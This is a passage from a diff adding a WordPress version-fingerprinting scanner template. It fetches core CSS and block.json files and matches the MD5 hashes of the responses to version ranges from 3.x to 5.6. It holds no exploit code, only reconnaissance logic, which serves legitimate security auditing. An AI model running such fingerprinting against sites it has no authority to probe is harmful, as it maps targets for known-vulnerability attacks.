md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"779eb4c7814b3e82228e77306d7537bd\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"d6824fcfdbd1dd2cae2ecd53818838da\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"a7e48e59fa5aec35ff1446a3e12c33e7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"cb2cd4c20d793c93e10f59dcddf70f30\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"adf9cddda7c0c97d8a188b3506355be4\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"3e71e641d1fca36fe6b0169145d9d10e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"23fb73a8d74154cb905fe8b69c437c65\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"f65c797ff4bdc97a61590c4106b43a52\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"45c2303a86c0b0cc5aa90af55f7100db\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"a080a4d6eed93194ba7be0beb8d99945\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ba7d6f34c9eeef4579940d4a4dc03ff3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"7f4b34c7ab664222bae7d3561c41068c\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"6e977885a56d7fb205284b679d545717\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.1 + dsl: + - "(\"ebc57eca1ff3628452d09629ce51047a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"c29329e44d6e8bdd19c6ef3e2ce5bd9a\" == md5(body))" + - type: dsl + name: 5.1.2 - 5.1.8 + dsl: + - "(\"81825ed3f80e128dcef13220deff02b9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"d703f2178551d235ce107c8b7f5e5e61\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"79c315d92ea0fd866722db3618ef50d3\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"cfe89277798e51f685aafac401edfe72\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"1d563107274d6f3d954b8071d0a55a45\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6cf2fbd6cfe5a53b5c22433e0fdf7f33\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2870907da358f5e21bf0e3f1875074c0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/html/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b39e466dcab40ea8f304d042ce179ec\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3798eb8f3d92dd791dd24700c2271959\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/column/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f4d6c66d01690e0fce9bb2d23c720769\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"621627beadf310b9b990a5e345f634ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/separator/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"aabe1dda90559a88e3874f809c6b302b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"907c5bdfeffab73a8c024f060a5db2c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/classic/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"adee64873f7bb0d68f446ccf49db0b71\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8c9a109c2571beec1b1cd39e53f2eea0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/more/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e32e6a6c2f9cb966729c317d2aad9785\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1b1cdbe8af4f0d583a377f8659a77f60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/archives/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"32823791a845af271ff8c3fcd35e5c9c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5a445473f9b5e1a4e1ed33df97f11434\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/list/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4283f9b36dcf7670502d3989fdca8715\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d37bdde94db55890c60cbddfcd7a63e7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/latest-comments/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b8d732e95d6635b79ae28481748bbcb8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9d6d2762ad00fe9e3021a27112643de3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/categories/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6c289cf6ab5f8552752ddf00b5489bb1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4c97ec7175e2af6a59eb15f3e319f23e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/text-columns/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"59e2a5f827be60dbba2d2380480ae524\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b92afdee7ec920a842e2be0d12ce2499\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/spacer/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"909f07a23f82a1d7d47bffd91ddd0f65\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9b39f563b5c3a308ca9b1a826d2c6e46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/nextpage/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9b715eaeb2ced0c57cf4e3c386fb2d1e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e51d57b68dbcab3751b0ad292ac4c8fb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/pullquote/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b839b85457fe74c1b9d6f166a152dfd5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ed9a40823cbcd20da93cbab5a21e279a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/subhead/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41a3f35bbe43fa1af83e58f9bf158ceb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a863d67a878fba1f866c8bc05197bd86\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/table/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c4fe6d72ffb2f1278ba622d364052076\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6a123d969e677f1bd05d4af3223a6834\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/rss/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"23694f35af5267032e9d4548cff976e8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3583b062ddcda7b24a3976fd4f195513\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/columns/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41ab9bd1a6771c071e54bbe659134266\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"55af73e6756fd7463dbfe80db51e501c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/button/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c7afe532f1dd6306dc9b0902a90d7812\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"be97ad5ccacf2742dad5b50a2d67b5b2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/heading/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d5922b3f79c5c2b67db0ec2517ce073d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"86ffc61cd4d57f61b89df17000eb69ab\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/social-links/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"10a3aed698839aa91f245b0c001ee2ea\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3e284b35d1950853bba5e966b249fcaf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/group/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d3be4e6b16625cdf0c8528a3cef7dc54\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a7e88fca718b97a35a8dd4597b19e805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/media-text/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c92d0c96d3c577711c04aeafde2ec3f6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"cbf874d7ffa569e49811820fbc9f97df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/block/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e8e49e3c9c93d5a42814e75162daf324\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3a4de2dda586eb9d1a97e5ca9165052b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/buttons/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5bc68f8f8a590862671b1a9943def5f3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2bccd4df2e0027b1605f32cf6b109e5d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/paragraph/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5efcb514b695d4e1c0403e2e3b1d266f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"28991e3ae8bababa834bbdf0a08519d9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/missing/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"237a65525f167fb21c105ad80861d3b7\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ba2412b859d4ba22394eca145274d566\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/quote/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7964f7c327c1c6edb0628767693cfe2d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e98dac0f8ea0a0029e0e5a0bd31d495\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/calendar/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"19f82b9ca4c05c0f6b4c33564dce5d32\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b66a05d7ebbb15387348a33c721f9b3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/image/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9cc125bbd91c86051a74b19c602d09f9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"651f818043ebd9b2a36002c77aa4099e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/tag-cloud/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"75f4f8b4009e14fc323e6942f9571de9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"052287ea36440570123519d03c728202\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/audio/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"10a618237f615b92ca220a4616050d7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a8853b818eea4a56f68ce738e1cd2b20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/latest-posts/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"130991aa9a24862eecb4cc74a3dde76b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"655ec3498b3fd3eef512a4773e5e1655\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/video/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0e547adddb611126e305babce207a0ea\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e204095892b1ed43e0db7ec6f041d441\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/verse/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"efc6b180800772fc581603adca739b87\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2cf2a27cb66ace196738b54da11ba85b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/code/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"db474f9685478365ba812657769bba9a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5f9688205db939b5a47e136eddc7ad55\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/file/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1ef23efdda9cecde00ebe785e98482ba\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f7c0056bf419ca380fcfec88dc8e5831\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/gallery/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e30565787c3717bf735162d344bc5c70\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3f3774e67c95d12408d1b1bd1196ad01\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/search/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b56b4486e42ff65eea9b1a2d304f6c48\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5396d05f685b6aa5d2153734be2a17f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/blocks/preformatted/block.json" + matchers: + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"535fe1ff4cb39ac5a6f5a4112c32519e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3820f941e2ff1b686af5f9a7d369cc5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"3c6435cd046cb20503989540df6bb299\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"b1e98d74916d7911bcc284eab254e2cb\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"5bbe4c2ecb541952ca408683e79fbb14\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f8fa4bcad00bddea5fc40dc4701ada1a\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"f25622d7920e308f35585f91572ac755\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"476e2bbfe969e737181ae9cfe762ef24\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4d6ca4acefd6ee3f4c49019bdc19ef48\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1f55126b05501747659d2db0df9f8334\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7496cd0ac9641aebc1bad0b7a4d3e7f8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"221cc5e1242083531de5c2216954fa50\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"aebfde61667894a8e13fec6e3485bdeb\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"ff073acb3f9177edfdcd35dfcd63fd71\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"095feb4ad3dc9c26670120c0f29dac10\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d4595757af421829b1524064511718ee\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"66f665a8de6a6f123b28cefae46557eb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"075a4ec4f5c24b7af6f879983f00e477\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"e888776b29d7888acda2e33b4131d3fa\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"d1f94f9a93f83b7dc4d924f04842d294\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"b26b83796f3aa0f932585cce3925be33\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"82e0a49003600469a595f3362d318f2c\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"eb60fd346a4039fdcf5912fce6dd1ad1\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9ed9dabd94f3a18eb8574dc2bd394ed2\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a37b3bb02583097a4a502df1d7e5cb25\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"08ccdd663a722b4551a3e7ff24b510a6\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"32a98483f9e4f78c17548372b940002a\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"13e3438edb73cd886466b480efde70b7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"b7cbb99a4dcb90b4b6014ebd3c706226\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"a25e23b0eceedaebe5046299e1b2b7a2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"db371a9bb3c8050843197400f68ba9df\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"aa04fc708866d04dbd758e16ac9293c1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a8dcad07317fa0500b76284fd890dee8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"dae18845cfc3c211c5c6de92401b2ad5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"dff3dd1a74dba4b1f43eb186e66527fc\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"726d1f1796a539919fd0406404dd24e2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"e00e1d287de9b4f665427b781153090b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6e6ae4efeeb4b153955047d63d1f9703\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"38498f539f05402b45802133dc18badd\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"df0a7de26cc6d44c0efd784d78181ad3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"ecacb2abac2365119b6e02320360f502\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"aa0b126055663de33e6bf670b002c635\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"438f7bb958e6bfdb80110ee0efcada79\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"a1fd22821b6c7702e7342b9b58db49e3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7689c288d2a1039dfca195ebb1cbe01a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b8a2e9ca1829d1a2f78c21cad088648b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"52df0ee7031b6591ad05d0175c162761\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"1ee52c1421996228205da31d46d967c3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b58173c40720794761eb3c00fd8dd845\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1f73ae24f66e26b2bb191712b427045d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"de1c2e841d52991cc738f4b029a4f249\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"ee2dad2b1125172ff11ab1ba0da58055\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5b2c5aa1462672e6856632e1901ece55\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"3269187936a176a98efc265d8332c5e4\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"37f26aba16eb341b2b1a6e36e5783e7b\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"cb15ea6714abe8a9e96aa3fddaecbfee\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3e2b2a932eab3ec981a1e511255c36b8\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"db6497f0a0342cc1045689e4ac0c0135\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ce85a25b6c4c9c30611b6ffc0ec63c31\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0d69bfe5e1fbf61a192084e6f5acd344\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"96a40386dd22398a9609ffa031e3522d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d438f2be1ff29ca5faf2b3c05924df44\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e77573da19e0ae9e9a18865f6d7c5dca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"33165e1b75e4cb6d47fdb2202060b684\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions-rtl.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"0114c79d89d3e0edd14d711c868d4fd7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"111e2567c39c778be470f37b5ad9952b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"48a1c7be34fe93a11b1652b2ee8d4a4e\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"8386d6dcf5ce18b47f790acecbd3dd97\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ecce9ac8713cbff2e3c02b5e74754514\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"aa4b9f80af7993692411777d66e9d2de\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3689b569f5d0d9eaed70ccfff0394634\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d1d73d17347055579633e891c06b9efb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"7db5304ec20677c46bbcbd7b9e9fa350\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"95cf37a45ba51f7acea2600ab04e2050\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"648a668518ad84c937e3370599b079ba\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"f1a70d5db540011fd1dea2d1d4d681d7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"375d030732f7adf73ada1738d831cffc\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"040c4477b10c9fcf3cffb761dcb0e50f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"262319e7380fad735c0992d75f8dcdb2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ff98e598cfe1516be02f2e4c18b1b834\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"a0347ba6476ac6b646d145697970e81c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8cadbf2aa4edbb8f4c4a70b2c81df4dc\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"0a1016dec8649f08c0f31bbb5c36cd01\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a6f2b4869450341fd4a85de9e9f1c3d5\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"9ab71d9bdcdc1a83b5314eb96196235a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"9b76925214a2d6be0836586daa7695af\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"188204f30b17861ace764b0e25e1bdec\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"2725a817d111107de5ee243229f741dc\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"af42a609ba502539031241366138e152\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"22e853bc14fe2ff1360a2f371fbc5c08\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"edc3a1e5f58e31e00a8d3f8e0a6e636c\" == md5(body))" + - type: dsl + name: 3.1 - 3.2.1 + dsl: + - "(\"430c7bd2b88082d9d8518e961dcc0c36\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"0fd5180cf4dd696a5ddba82caec422bc\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"717c172fdbaa9843409c603ca7bf5850\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b04f063afb472c3d7c9da4c252147d9e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"feb003c2a47619ac633934cbed3a10b8\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6e27243fb0ec55268be46392ed3f98a0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"030e75d241af2af375a74fc49ad66837\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"237c08b52205d548726014723d043ece\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/admin-menu.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1056f3272ebe83f13d5d3f86a82a77f4\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"611efcc5caad0f3085897836e4ce1f3b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"a6f0b8d7e3d6fa68eb42118e6b3d3b57\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4a22ae006903e377b68dc697fc0cc46a\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"92589674d68fa4fd88208767abfb29bd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b4f403367235a239a2b7e43997e91e65\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"f86faa9e59a5c7d5d71b840bfc1bffdb\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d17dc4b834c38295ee7d3fd3339eff8b\" == md5(body))" 